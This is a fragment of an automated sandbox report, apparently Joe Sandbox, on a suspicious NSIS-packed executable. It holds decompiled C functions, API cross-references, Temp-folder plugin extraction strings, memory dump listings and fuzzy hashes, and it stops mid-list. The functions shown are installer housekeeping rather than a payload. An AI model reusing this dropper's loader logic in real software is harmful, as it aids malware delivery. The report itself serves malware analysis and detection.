Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp
API String ID: 2655323295-1281894108
Opcode ID: 861f193ed713728b6608d55f4f34c9aa4f20ee75e1065734592e0effa691dc87
Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
Opcode Fuzzy Hash: 861f193ed713728b6608d55f4f34c9aa4f20ee75e1065734592e0effa691dc87
Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405DD6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405dd7
0x00405de4
0x00405de5
0x00405df0
0x00405df8
0x00405df8
0x00405e00

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD

Uniqueness

Uniqueness Score: -1.00%

Function 6E5510E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E5510E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x6e55506c = _a8;
				 *0x6e555070 = _a16;
				 *0x6e555074 = _a12;
				_a12( *0x6e555048, E6E551651, _t73);
				_t66 =  *0x6e55506c +  *0x6e55506c * 4 << 3;
				_t27 = E6E5512E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x6e555040;
							if( *0x6e555040 == 0) {
								goto L26;
							}
							E6E551603( *0x6e555074, _t31 + 4, _t66);
							_t34 =  *0x6e555040;
							_t86 = _t86 + 0xc;
							 *0x6e555040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6E551312(E6E55135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6E551381(_t80, E6E5512E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E6E551603(_t10,  *0x6e555074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x6e555040;
							 *0x6e555040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x6e555070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E6E551603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x6e55506c +  *0x6e55506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E6E551603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x6e555070);
						 *( *0x6e555070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x6e5510eb
0x6e551100
0x6e551109
0x6e55110e
0x6e551119
0x6e55111c
0x6e551125
0x6e551129
0x6e55112b
0x6e5512b0
0x6e5512ba
0x6e5512ba
0x6e551132
0x6e551132
0x6e551137
0x6e551138
0x6e55113a
0x6e55113d
0x6e551256
0x6e551259
0x6e551271
0x6e551271
0x6e551278
0x00000000
0x00000000
0x6e551285
0x6e55128a
0x6e55128f
0x6e551294
0x6e55129a
0x6e55129b
0x00000000
0x6e55129b
0x6e55125b
0x6e55125e
0x6e5511bc
0x6e5511bf
0x6e5511c2
0x6e5511cb
0x6e5511d0
0x00000000
0x6e5511d1
0x6e551264
0x6e551266
0x6e5511a2
0x6e5511a5
0x6e5511a8
0x6e5511b1
0x00000000
0x6e5511b1
0x6e551164
0x6e551165
0x6e551177
0x6e551180
0x6e551184
0x6e55118e
0x6e551191
0x6e551193
0x6e551193
0x00000000
0x6e551165
0x6e551143
0x6e551218
0x6e55121d
0x6e551221
0x6e551223
0x6e55122c
0x6e55122f
0x6e551238
0x6e55123d
0x6e55123d
0x6e551247
0x6e55124a
0x00000000
0x6e551250
0x6e551149
0x6e55114c
0x6e5511e9
0x6e5511ed
0x6e5511f7
0x6e5511fb
0x6e551205
0x6e55120a
0x6e551211
0x00000000
0x6e551211
0x6e551152
0x6e551155
0x00000000
0x00000000
0x6e55115b
0x6e55115e
0x6e5511b8
0x00000000
0x6e5511b8
0x6e551160
0x6e551162
0x6e55119e
0x00000000
0x6e55119e
0x00000000
0x6e5512a1
0x6e5512a1
0x6e5512ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6E551171
GlobalAlloc.KERNEL32(00000040,?), ref: 6E5511E3
GlobalFree.KERNEL32 ref: 6E55124A
GlobalFree.KERNEL32(?), ref: 6E55129B
GlobalFree.KERNEL32(00000000), ref: 6E5512B1

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6a678e5cea52d7e389918207166efd9b9fa70d478692e3e0aa5aa68de473c1ee
Instruction ID: 29bee7db83dffb453f0d7b4b999ff4b555e19bfe6c02cd2bf0d209436d867fe5
Opcode Fuzzy Hash: 6a678e5cea52d7e389918207166efd9b9fa70d478692e3e0aa5aa68de473c1ee
Instruction Fuzzy Hash: 42519075900B02DFDB40CFAACA589667BE8FB46315B01491BF905DB720EB74ED28CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E00406529("C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adc8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E00406467(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060D8(_t31, _t31) >= 0) {
						_t14 = E004060A9(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsx50C8.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp$C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll
API String ID: 1659193697-1160677098
Opcode ID: 85f473177953107b28b6dbe9815c3a2c144e2e49782b1401e960188114f72f0e
Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
Opcode Fuzzy Hash: 85f473177953107b28b6dbe9815c3a2c144e2e49782b1401e960188114f72f0e
Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x420ec0 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42a22c) {
							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
							 *0x420ec0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406910(0);
					}
				} else {
					_t6 =  *0x420ec0;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420ec0 = 0;
					return _t6;
				}
			}

0x00403020
0x00403040
0x0040304a
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405EDE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406507(0x425f10, _a4);
				_t21 = E00405E81(0x425f10);
				if(_t21 != 0) {
					E0040678E(_t21);
					if(( *0x42a238 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f10 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f10);
							_push(0x425f10);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040683D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E22(0x425f10);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DD6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405eea
0x00405ef5
0x00405ef9
0x00405f00
0x00405f0c
0x00405f1c
0x00405f1e
0x00405f36
0x00405f37
0x00405f3e
0x00405f3f
0x00000000
0x00000000
0x00405f22
0x00405f29
0x00405f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f29
0x00405f41
0x00000000
0x00405f55
0x00405f0e
0x00405f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f14
0x00405efb
0x00000000

APIs

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,770F3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,770F3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,770F3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,770F3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,770F3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,770F3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x4236f4 = _t16;
							E00404E9E();
						}
						L11:
						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E1E(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044AF(0x413);
				return 0;
			}

0x004054e1
0x004054eb
0x00405507
0x00405529
0x0040552c
0x00405532
0x0040553c
0x0040553d
0x0040553f
0x00405545
0x00405545
0x0040554f
0x00000000
0x0040555d
0x00405514
0x0040554c
0x0040554c
0x00000000
0x0040554c
0x00405520
0x00405522
0x00000000
0x00405522
0x004054f1
0x00000000
0x00000000
0x004054f8
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B21() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216cc;
				_t3 = E00403B06(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216cc =  *0x4216cc & 0x00000000;
				return _t3;
			}

0x00403b22
0x00403b2a
0x00403b31
0x00403b34
0x00403b34
0x00403b36
0x00403b3b
0x00403b42
0x00403b48
0x00403b4c
0x00403b4d
0x00403b55

APIs

FreeLibrary.KERNEL32(?,770F3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
GlobalFree.KERNEL32(?), ref: 00403B42

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E22(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405e23
0x00405e2d
0x00405e30
0x00405e36
0x00405e37
0x00405e38
0x00405e40
0x00000000
0x00000000
0x00000000
0x00405e40
0x00405e42
0x00405e4a

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xKBLVUHoY6.exe,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xKBLVUHoY6.exe,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003), ref: 00405E38

Strings

C:\Users\user\Desktop, xrefs: 00405E22

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
